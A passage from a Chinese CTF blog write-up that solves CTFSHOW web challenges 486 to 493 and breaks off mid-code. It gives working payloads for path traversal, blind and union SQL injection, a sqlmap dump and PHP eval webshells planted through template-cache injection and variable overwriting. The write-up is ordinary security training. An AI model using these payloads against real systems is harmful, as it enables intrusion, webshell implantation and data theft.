<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>CTFSHOW 中期测评（一）web486 - web501 - WayneJH Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="WayneJH Blog"><meta name="msapplication-TileImage" content="https://oss.waynejoons.icu/picphoto/favicon.ico"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="WayneJH Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights. Here you can learn a lot about cybersecurity knowledge"><meta property="og:type" content="blog"><meta property="og:title" content="CTFSHOW 中期测评（一）web486 - web501"><meta property="og:url" content="https://waynejoon.github.io/posts/ctfshow-mid-term-assessment-web486-web501/"><meta property="og:site_name" content="WayneJH Blog"><meta property="og:description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights. Here you can learn a lot about cybersecurity knowledge"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://waynejoon.github.io/img/waynejoon.jpg"><meta property="article:published_time" content="2025-09-19T11:09:26.000Z"><meta property="article:modified_time" content="2025-09-23T14:16:51.401Z"><meta property="article:author" content="WayneJoon.H"><meta property="article:tag" content="CTFSHOW"><meta property="article:tag" content="CTF练习"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://waynejoon.github.io/img/waynejoon.jpg"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://waynejoon.github.io/posts/ctfshow-mid-term-assessment-web486-web501/"},"headline":"CTFSHOW 中期测评（一）web486 - web501","image":["https://waynejoon.github.io/img/waynejoon.jpg"],"datePublished":"2025-09-19T11:09:26.000Z","dateModified":"2025-09-23T14:16:51.401Z","author":{"@type":"Person","name":"WayneJoon.H"},"publisher":{"@type":"Organization","name":"WayneJH Blog","logo":{"@type":"ImageObject","url":{"text":"WayneJH"}}},"description":"CTFSHOW 中期测评第一部分详细题解"}</script><link rel="canonical" href="https://waynejoon.github.io/posts/ctfshow-mid-term-assessment-web486-web501/"><link rel="icon" href="https://oss.waynejoons.icu/picphoto/favicon.ico"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="WayneJH Blog" type="application/atom+xml">
</head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/">WayneJH</a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/links">友链</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="GitHub" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2025-09-19T11:09:26.000Z" title="2025/9/19 19:09:26">2025-09-19</time>发表</span><span class="level-item"><a class="link-muted" href="/categories/CTFSHOW/">CTFSHOW</a></span><span class="level-item">26 分钟读完 (大约3846个字)</span><span class="level-item" id="busuanzi_container_page_pv" style="display:none"><span id="busuanzi_value_page_pv">--</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">CTFSHOW 中期测评（一）web486 - web501</h1><div class="content"><h2 id="题目列表"><a href="#题目列表" class="headerlink" title="题目列表"></a>题目列表</h2><h3 id="web486"><a href="#web486" class="headerlink" title="web486"></a>web486</h3><p>打开之后发现是个登录框，PATH为<code>/index.php?action=login</code></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917164405707.png"></p>
<p>尝试修改<code>/index.php?action=login</code>为<code>/index.php?action=1</code>，发生报错</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917164527980.png"></p>
<p>由报错内容可知网站可能存在文件包含漏洞，尝试进行目录穿越读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?action=../flag</span><br></pre></td></tr></table></figure>

<p>访问源码得到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917164756984.png"></p>
<h3 id="web487"><a href="#web487" class="headerlink" title="web487"></a>web487</h3><p>修改<code>/index.php?action=login</code>为<code>/index.php?action=../index</code>，可以查看源码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917174046175.png"></p>
<p>存在SQL注入漏洞，而且没有过滤，测试后发现没有回显，用时间盲注</p>
<p>先验证一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?action=check&amp;username=1&amp;password=&#x27;) or sleep(3)--+</span><br></pre></td></tr></table></figure>

<p>没有问题</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917175010543.png"></p>
<p>这里用sqlmap去跑结果了，省点时间</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -u &quot;https://39dc9317-0164-419c-ac40-b3d76de931e5.challenge.ctf.show/index.php?action=check&amp;username=1&amp;password=1&quot; --batch -D ctfshow -T flag -C flag --dump</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250917175155899.png"></p>
<h3 id="web488"><a href="#web488" class="headerlink" title="web488"></a>web488</h3><p>打开题目之后，也是跟之前一样读取index代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?action=../index</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250917194101303.png"></p>
<p>sql那里两个参数都被md5包裹了，不能用sql注入做了。继续往下分析，可以看到有个<code>templateUtil::render(&#39;error&#39;,array(&#39;username&#39;=&gt;$username))</code>，暂时不知道<code>templateUtil</code>类和<code>render</code>函数有何用处</p>
<p>同时看到上面<code>include</code>了两个php文件</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917194452692.png"></p>
<p>通过目录穿越读取这两个文件代码分析后，发现 <code>render_class.php</code> 有用，<code>db_class.php</code> 则是数据库的一些连接配置，暂时用不到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?action=../render/render_class</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250917194829916.png"></p>
<p>可以看到里面定义了<code>render</code>函数和<code>shade</code>函数，其中<code>render</code>函数我们重点关注以下代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">	<span class="variable">$templateContent</span>=file<span class="title class_">Util</span>::<span class="title function_ invoke__">read</span>(<span class="string">&#x27;templates/&#x27;</span>.<span class="variable">$template</span>.<span class="string">&#x27;.php&#x27;</span>);</span><br><span class="line">	<span class="variable">$cache</span>=template<span class="title class_">Util</span>::<span class="title function_ invoke__">shade</span>(<span class="variable">$templateContent</span>,<span class="variable">$arg</span>);</span><br><span class="line">	cache::<span class="title function_ invoke__">create_cache</span>(<span class="variable">$template</span>,<span class="variable">$cache</span>);</span><br><span class="line">	<span class="keyword">echo</span> <span class="variable">$cache</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>$templateContent</code> 获取<code>templates/$template.php</code>页面返回的内容，然后<code>$cache</code>调用<code>shade</code>函数替换<code>$templateContent</code> 中的字符串，把<code>&#123;&#123;username&#125;&#125;</code>替换为传入的数组<code>key:value</code>中的value值，最后再调用<code>cache</code>类中的<code>create_cache</code>函数</p>
<p>上面可以看到包含了<code>cache_class.php</code>，我们继续看看<code>create_cache</code>函数有什么作用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?action=../render/cache_class</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250917195914926.png"></p>
<p><code>create_cache</code>函数先检查是否存在文件<code>cache/md5($template).php</code>，如果没有则创建一个php文件，并把<code>$content</code>写进去，其中<code>$content</code>我们可以控制，且<code>$template</code>也是固定的，那就很简单了</p>
<p>利用链：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">templateUtil::render() -&gt; templateUtil::shade() -&gt; cache::create_cache() -&gt; fileUtil::write()</span><br></pre></td></tr></table></figure>

<p>我们看看<code>index</code>关键代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$action</span>==<span class="string">&#x27;check&#x27;</span>)&#123;</span><br><span class="line">	<span class="variable">$username</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;username&#x27;</span>];</span><br><span class="line">	<span class="variable">$password</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;password&#x27;</span>];</span><br><span class="line">	<span class="variable">$sql</span> = <span class="string">&quot;select id from user where username = &#x27;&quot;</span>.<span class="title function_ invoke__">md5</span>(<span class="variable">$username</span>).<span class="string">&quot;&#x27; and password=&#x27;&quot;</span>.<span class="title function_ invoke__">md5</span>(<span class="variable">$password</span>).<span class="string">&quot;&#x27; order by id limit 1&quot;</span>;</span><br><span class="line">	<span class="variable">$user</span>=db::<span class="title function_ invoke__">select_one</span>(<span class="variable">$sql</span>);</span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$user</span>)&#123;</span><br><span class="line">		template<span class="title class_">Util</span>::<span class="title function_ invoke__">render</span>(<span class="string">&#x27;index&#x27;</span>,<span class="keyword">array</span>(<span class="string">&#x27;username&#x27;</span>=&gt;<span class="variable">$username</span>));</span><br><span class="line">	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		template<span class="title class_">Util</span>::<span class="title function_ invoke__">render</span>(<span class="string">&#x27;error&#x27;</span>,<span class="keyword">array</span>(<span class="string">&#x27;username&#x27;</span>=&gt;<span class="variable">$username</span>));</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>$user</code>不存在时就会进入else语句，然后传入<code>$template</code>为 error，数组为<code>[username: 任意内容]</code>。我们可以写个webshell进去，因为error的md5值为<code>cb5e100e5a9a3e7f6d1fd97512215282</code>，文件会上传到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cache/cb5e100e5a9a3e7f6d1fd97512215282.php</span><br></pre></td></tr></table></figure>

<p>要注意如果已经查询过的话，会进入else分支，那么<code>cache/cb5e100e5a9a3e7f6d1fd97512215282.php</code>就已经存在了，后面再查询就会返回true，无法再进入<code>create_cache</code>函数的else分支，也就无法再写入webshell了，这种情况只能重开靶机，这一点要注意</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917201550550.png"></p>
<p>可以输入<code>/index.php?action=error</code>测试一下，访问<code>templates/error.php</code>，可以看到页面返回<code>&#123;&#123;username&#125;&#125;不存在</code>，正好符合条件，可以把<code>&#123;&#123;username&#125;&#125;</code>置换为我们传入的任意内容</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917203151855.png"></p>
<p>重开靶机，然后GET传入payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?action=check&amp;username=&lt;?php eval($_POST[1]);?&gt;&amp;password=123</span><br></pre></td></tr></table></figure>

<p>显示不存在即为成功</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917202346350.png"></p>
<p>然后蚁剑连接，路径为<code>cache/cb5e100e5a9a3e7f6d1fd97512215282.php</code>，要注意把https改成http</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917202610965.png"></p>
<p>在根目录找到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917202646186.png"></p>
<h3 id="web489"><a href="#web489" class="headerlink" title="web489"></a>web489</h3><p>继续看index代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?action=../index</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250917205447532.png"></p>
<p>可以看到else分支改了，不能上传内容到error那里了，但是题目给出了关键代码<code>extract($_GET)</code>，意思是将 <code>$_GET</code> 数组中的所有键值对转换成对应的普通变量，那我们可以通过变量覆盖来触发<code>templateUtil::render(&#39;index&#39;,array(&#39;username&#39;=&gt;$username))</code>，效果跟上题一样</p>
<p>这次题目贴心给出了cache清除代码，如果你在登录框尝试登录过，那可以通过输入<code>/index.php?action=clear</code>来清除cache目录，这样就不用重启靶机了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$action</span>==<span class="string">&#x27;clear&#x27;</span>)&#123;</span><br><span class="line">	<span class="title function_ invoke__">system</span>(<span class="string">&#x27;rm -rf cache/*&#x27;</span>);</span><br><span class="line">	<span class="keyword">die</span>(<span class="string">&#x27;cache clear&#x27;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>方法跟上题差不多，不过payload要改成</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?action=check&amp;username=&lt;?php eval($_POST[1]);?&gt;&amp;sql=select 1;</span><br></pre></td></tr></table></figure>

<p>通过变量覆盖使if永真，然后读取的位置从error变成了index，其他一样</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917210829319.png"></p>
<p>在根目录找到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917210906532.png"></p>
<h3 id="web490"><a href="#web490" class="headerlink" title="web490"></a>web490</h3><p>先来看看index代码，方法跟之前一样</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917212938997.png"></p>
<p>我们关注重点以下代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$action</span>==<span class="string">&#x27;check&#x27;</span>)&#123;</span><br><span class="line">	<span class="title function_ invoke__">extract</span>(<span class="variable">$_GET</span>);</span><br><span class="line">	<span class="variable">$sql</span> = <span class="string">&quot;select username from user where username = &#x27;&quot;</span>.<span class="variable">$username</span>.<span class="string">&quot;&#x27; and password=&#x27;&quot;</span>.<span class="title function_ invoke__">md5</span>(<span class="variable">$password</span>).<span class="string">&quot;&#x27; order by id limit 1&quot;</span>;</span><br><span class="line">	<span class="variable">$user</span>=db::<span class="title function_ invoke__">select_one</span>(<span class="variable">$sql</span>);</span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$user</span>)&#123;</span><br><span class="line">		template<span class="title class_">Util</span>::<span class="title function_ invoke__">render</span>(<span class="string">&#x27;index&#x27;</span>,<span class="keyword">array</span>(<span class="string">&#x27;username&#x27;</span>=&gt;<span class="variable">$user</span>-&gt;username));</span><br><span class="line">	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		template<span class="title class_">Util</span>::<span class="title function_ invoke__">render</span>(<span class="string">&#x27;error&#x27;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>sql语句变了，<code>username</code>那里没有md5包裹了，然后<code>render(&#39;index&#39;,array(&#39;username&#39;=&gt;$username));</code>变成了<code>render(&#39;index&#39;,array(&#39;username&#39;=&gt;$user-&gt;username));</code></p>
<p>那好办，方法跟之前一样，只不过这次通过sql注入改变查询的<code>username</code>的值，使后面的<code>$user-&gt;username</code>能返回我们想要的值</p>
<p>但是一开始输入payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?action=check&amp;username=1&#x27; union select &#x27;&lt;?php eval($_POST[1]);?&gt;&#x27;--+&amp;password=1</span><br></pre></td></tr></table></figure>

<p>会发现莫名其妙返回了一个<code>?&gt;</code></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917214115490.png"></p>
<p>查看<code>/cache/6a992d5529f459a44fee58c733255e86.php</code>，发现页面显示语法错误</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917214234576.png"></p>
<p>那估计大概率是字符串替换后本身就已经被php标签包裹了，所以多出来的<code>?&gt;</code>就显示在页面上了。后面发现<code>/index.php?action=index</code>可以看到传入后的代码，也验证了猜想</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917214937407.png"></p>
<p>那我们修改一下代码，先输入<code>/index.php?action=clear</code>清空缓存，再传入payload，后面的题目如果有输入过username这些，记得一定要先清空cache，不然内容写不进去</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?action=check&amp;username=1&#x27; union select &#x27;eval($_POST[1])&#x27;--+&amp;password=1</span><br></pre></td></tr></table></figure>

<p>蚁剑连接，在根目录找到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250917215317317.png"></p>
<h3 id="web491"><a href="#web491" class="headerlink" title="web491"></a>web491</h3><p>继续分析代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919103825597.png"></p>
<p>被修复了，不能用之前的方法写入webshell了，但是username那边没有md5包裹，可以用SQL注入获取flag</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?action=check&amp;username=1&#x27; union select load_file(&#x27;/flag&#x27;) into outfile &quot;/tmp/3.php&quot; --+&amp;password=1</span><br></pre></td></tr></table></figure>

<p>然后目录穿越读取flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919104400983.png"></p>
<h3 id="web492"><a href="#web492" class="headerlink" title="web492"></a>web492</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919110723087.png"></p>
<p>这个多了一个正则，然后上题的<code>templateUtil::render(&#39;index&#39;)</code>改回<code>templateUtil::render(&#39;index&#39;,$user)</code>，可以继续用之前的方法</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?action=check&amp;username=&#x27;1&amp;user[username]=&lt;?php eval($_POST[1]);?&gt;</span><br></pre></td></tr></table></figure>

<p>大概思路就是利用<code>extract($_GET);</code>污染变量，然后username随便带个符号跳过正则验证直接来到<code>templateUtil::render(&#39;index&#39;,$user)</code>，后面的步骤跟之前一样，也是通过字符串替换写入webshell</p>
<p>然后蚁剑连接读取flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919111409023.png"></p>
<h3 id="web493"><a href="#web493" class="headerlink" title="web493"></a>web493</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919120315974.png"></p>
<p>因为下面的render只传入了<code>$template</code>，没有传入数组参数，所以不能走这条路。然后SQL那里又有正则限制，不能出现符号，所以也无法进行SQL注入，但是上面出现了关键代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$action</span>))&#123;</span><br><span class="line">	<span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_COOKIE</span>[<span class="string">&#x27;user&#x27;</span>]))&#123;</span><br><span class="line">		<span class="variable">$c</span>=<span class="variable">$_COOKIE</span>[<span class="string">&#x27;user&#x27;</span>];</span><br><span class="line">		<span class="variable">$user</span>=<span class="title function_ invoke__">unserialize</span>(<span class="variable">$c</span>);</span><br></pre></td></tr></table></figure>

<p>那我们可以用反序列化来做这题，读取上面的<code>render/db_class.php</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?action=../render/db_class</span><br></pre></td></tr></table></figure>

<p>得到代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">db</span></span>&#123;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$db</span>;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$log</span>;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$sql</span>;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$username</span>=<span class="string">&#x27;root&#x27;</span>;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$password</span>=<span class="string">&#x27;root&#x27;</span>;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$port</span>=<span class="string">&#x27;3306&#x27;</span>;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$addr</span>=<span class="string">&#x27;127.0.0.1&#x27;</span>;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$database</span>=<span class="string">&#x27;ctfshow&#x27;</span>;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">		<span class="variable language_">$this</span>-&gt;log=<span class="keyword">new</span> <span class="title function_ invoke__">dbLog</span>();</span><br><span class="line">		<span class="variable language_">$this</span>-&gt;db=<span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">getConnection</span>();</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getConnection</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">		 </span><br><span class="line">		<span class="keyword">return</span> <span class="keyword">new</span> <span class="title function_ invoke__">mysqli</span>(<span class="variable">$this</span>-&gt;addr,<span class="variable">$this</span>-&gt;username,<span class="variable">$this</span>-&gt;password,<span class="variable">$this</span>-&gt;database);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">public</span>  <span class="function"><span class="keyword">function</span> <span class="title">select_one</span>(<span class="params"><span class="variable">$sql</span></span>)</span>&#123;</span><br><span class="line">		<span class="variable language_">$this</span>-&gt;sql=<span class="variable">$sql</span>;</span><br><span class="line">		<span class="variable">$conn</span> = db::<span class="title function_ invoke__">getConnection</span>();</span><br><span class="line">		<span class="variable">$result</span>=<span class="variable">$conn</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="variable">$sql</span>);</span><br><span class="line">		<span class="keyword">if</span>(<span class="variable">$result</span>)&#123;</span><br><span class="line">			<span class="keyword">return</span> <span class="variable">$result</span>-&gt;<span class="title function_ invoke__">fetch_object</span>();</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">public</span>  <span class="function"><span class="keyword">function</span> <span class="title">select_one_array</span>(<span class="params"><span class="variable">$sql</span></span>)</span>&#123;</span><br><span class="line">		<span class="variable language_">$this</span>-&gt;sql=<span class="variable">$sql</span>;</span><br><span class="line">		<span class="variable">$conn</span> = db::<span class="title function_ invoke__">getConnection</span>();</span><br><span class="line">		<span class="variable">$result</span>=<span class="variable">$conn</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="variable">$sql</span>);</span><br><span class="line">		<span class="keyword">if</span>(<span class="variable">$result</span>)&#123;</span><br><span class="line">			<span class="keyword">return</span> <span class="variable">$result</span>-&gt;<span class="title function_ invoke__">fetch_assoc</span>();</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">		<span class="variable language_">$this</span>-&gt;log-&gt;<span class="title function_ invoke__">log</span>(<span class="variable">$this</span>-&gt;sql);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">dbLog</span></span>&#123;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$sql</span>;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$content</span>;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$log</span>;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">		<span class="variable language_">$this</span>-&gt;log=<span class="string">&#x27;log/&#x27;</span>.<span class="title function_ invoke__">date_format</span>(<span class="title function_ invoke__">date_create</span>(),<span class="string">&quot;Y-m-d&quot;</span>).<span class="string">&#x27;.txt&#x27;</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">log</span>(<span class="params"><span class="variable">$sql</span></span>)</span>&#123;</span><br><span class="line">		<span class="variable language_">$this</span>-&gt;content = <span class="variable language_">$this</span>-&gt;content.<span class="title function_ 